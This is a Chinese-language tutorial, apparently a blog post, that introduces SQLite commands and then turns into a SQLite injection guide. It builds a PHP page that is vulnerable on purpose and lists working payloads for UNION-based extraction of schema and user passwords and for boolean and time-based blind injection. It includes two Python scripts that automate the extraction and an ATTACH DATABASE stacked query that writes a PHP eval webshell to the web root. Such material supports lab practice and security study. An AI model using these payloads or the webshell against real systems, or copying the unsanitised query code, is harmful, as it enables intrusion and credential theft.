SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,你不需要在系统中配置。
SQLite数据库的特点是它每一个数据库都是一个文件,当你查询表的完整信息时会得到创建表的语句,基本和mysql差不多。
SQLite 语法
1.
.help 获取可用的点命令的清单
.show 显示各种设置的当前值
.quite 退出SQLite 提示符
.databases 列出数据库的名称及其所依附的文件
.schema ?TABLE? 显示 CREATE 语句,例如.schema sqlite_master
➜ sqlite3 dbname.db
SQLite version 3.32.3 2020-06-18 14:16:19
Enter ".help" for usage hints.
sqlite> .databases
main: /Users/ye1s/Desktop/work/dbname.db
sqlite> .open test.db
sqlite> ATTACH DATABASE 'testDB.db' as 'TEST';
sqlite> .databases
main: /Users/ye1s/Desktop/work/dbname.db
TEST: /Users/ye1s/Desktop/work/testDB.db
sqlite> CREATE TABLE USERS(
...> ID INT PRIMARY KEY NOT NULL,
...> USERNAME TEXT NOT NULL,
...> PASSWORD TEXT NOT NULL
...> );
sqlite> .tables
USERS
sqlite> .schema users
CREATE TABLE USERS(
ID INT PRIMARY KEY NOT NULL,
USERNAME TEXT NOT NULL,
PASSWORD TEXT NOT NULL
);
sqlite> INSERT INTO users (id,username,password) VALUES (1, 'admin', 'password');
sqlite> select * from users;
1|admin|password
sqlite> .header on
sqlite> .mode column
sqlite> select * from users;
ID USERNAME PASSWORD
---------- ---------- ----------
1 admin password
sqlite> drop table users;
sqlite> .tables
SQLite 注入
2.
<html>
<body>
<form action="" method="POST">
<input type="text" name="id" size="80">
<input type="submit">
</form>
</body>
</html>
<?php
class MyDB extends SQLite3
{
function __construct()
{
$this->open('dbname.db');
}
}
$db = new MyDB();
if(!$db){
echo $db->lastErrorMsg();
} else {
echo "You can query users by ID.\n</br>";
}
$id = $_POST['id'];
$sql =<<<EOF
SELECT * from users where id='$id';
EOF;
$ret = $db->query($sql);
if($ret==false){
echo "Error in fetch ".$db->lastErrorMsg();
}
else{
while($row = $ret->fetchArray(SQLITE3_ASSOC) ){
echo "ID = ". $row['ID'] . "</br>";
echo "Username = ". $row['USERNAME'] ."</br>";
echo "Password = ". $row['PASSWORD'] ."</br>";
}
var_dump($ret->fetchArray(SQLITE3_ASSOC));
}
$db->close();
?>
sqlite3 dbname.db
CREATE TABLE USERS(
ID INT PRIMARY KEY NOT NULL,
USERNAME TEXT NOT NULL,
PASSWORD TEXT NOT NULL
);
INSERT INTO users (id,username,password) VALUES (1, 'admin', 'password');
INSERT INTO users (id,username,password) VALUES (2, 'test', 'test');
/*
开始,并扩展至下一个 */
字符对或直到输入结束,以先到者为准。SQLite的注释可以跨越多行。1';
1' --
1' /*
1' order by 5 --
-1' union select 1,2,3 --
-1' union select 1,2,sqlite_version() --
-1' union select 1, (select sql from sqlite_master) ,3--
-1' union select 1, (select group_concat(USERNAME,PASSWORD) from users) ,3--
-1' or substr((select group_concat(sql) from sqlite_master),1,1)<'a'/*
-1' or substr((select group_concat(sql) from sqlite_master),1,1)>'a'/*
import requests
url = 'http://localhost:9000/index.php'
flag = ''
for i in range(1,500):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
payload = "-1' or substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}'/*".format(i,chr(mid))
datas = {
"id": payload
}
res = requests.post(url=url,data=datas)
if 'Username' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
print('\n'+bytes.fromhex(flag).decode('utf-8'))
-1' or (case when(substr(sqlite_version(),1,1)>'3') then randomblob(300000000) else 0 end)/*
import requests
import time
url = 'http://localhost:9000/index.php'
flag = ''
for i in range(1,500):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
payload = "-1' or (case when(substr((select hex(group_concat(sql)) from sqlite_master),{0},1)>'{1}') then randomblob(300000000) else 0 end)/*".format(i,chr(mid))
datas = {
"id": payload
}
start_time=time.time()
res = requests.post(url=url,data=datas)
end_time=time.time()
spend_time=end_time-start_time
if spend_time>=2:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
print('\n'+bytes.fromhex(flag).decode('utf-8'))
ATTACH DATABASE file_name AS database_name;
ATTACH DATABASE '/var/www/html/shell.php' AS shell;
create TABLE shell.exp (webshell text);
insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>');
1';ATTACH DATABASE '/var/www/html/shell.php' AS shell;
create TABLE shell.exp (webshell text);
insert INTO shell.exp (webshell) VALUES ('<?php eval($_POST[a]);?>'); /*
文章评论